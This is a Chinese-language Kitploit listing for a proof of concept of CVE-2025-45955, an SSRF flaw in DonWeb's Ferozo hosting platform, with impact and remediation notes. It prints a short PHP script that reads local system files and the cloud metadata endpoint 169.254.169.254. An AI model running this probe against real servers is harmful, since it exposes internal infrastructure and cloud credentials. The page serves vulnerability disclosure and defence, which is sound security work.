Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-45955 — CVE-2025-45955 的概念验证漏洞利用,演示了 DonWeb Ferozo 托管平台中的服务端请求伪造(SSRF),可实现内部基础设施测绘和云元数据枚举。 | Kitploit
工具/GitHubGitHub/surendrapuppala7/cve-2025-45955
侦察漏洞分析漏洞利用信息收集Web安全云安全
GitHubsurendrapuppala7/cve-2025-45955

CVE-2025-45955

CVE-2025-45955 的概念验证漏洞利用,演示了 DonWeb Ferozo 托管平台中的服务端请求伪造(SSRF),可实现内部基础设施测绘和云元数据枚举。

查看仓库
138个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-45955

DonWeb Ferozo 中的服务端请求伪造 (CVE-2025-45955)

描述

攻击者可以通过在 Ferozo 托管平台上上传并执行特制的 PHP 文件来利用此漏洞。一旦被访问,该文件会发起一系列 SSRF 尝试,针对内部服务(如 127.0.0.1、169.254.169.254 或服务网格端点)、本地文件(例如 file:///etc/passwd)以及已知云元数据端点。该脚本会收集响应或错误消息,使攻击者能够测绘内部基础设施、枚举可访问的服务,并收集敏感信息以进行进一步利用。

概念验证 (PoC)

以下代码演示了该漏洞:

root@kitploit:~
<?php
$targets = [
  "file:///etc/hosts",
  "file:///etc/resolv.conf",
  "http://127.0.0.1/",
  "http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
  echo "[*] Trying: $url\n";
  $res = @file_get_contents($url);
  echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>

受影响组件

  • Ferozo 托管平台 (DonWeb)
  • 基于 PHP 的环境,允许执行用户上传或用户控制的 PHP 文件

影响

  • 信息泄露:泄露内部 IP、文件内容、云元数据端点
  • 基础设施侦察:支持端口和服务枚举(Docker、Kubelet 等)
  • 云利用潜力:探测已知元数据端点,例如 AWS、GCP 和阿里云
  • 链式利用机会:可与其他本地漏洞结合,实现 RCE 或内网横向移动

修复建议

  • 限制文件包含和 URL 访问函数(file_get_contents、fopen 等)
  • 通过出站防火墙规则阻止访问内部 IP 范围(127.0.0.0/8、169.254.169.254 等)
  • 审计并净化可能影响文件路径或 URL 的用户输入

CVE 编号

CVE-2025-45955


发现者

由 [Facundo Fernandez, Jinook Kim, Surendra Puppala / 安全研究人员 | @BYU] 报告

下载工具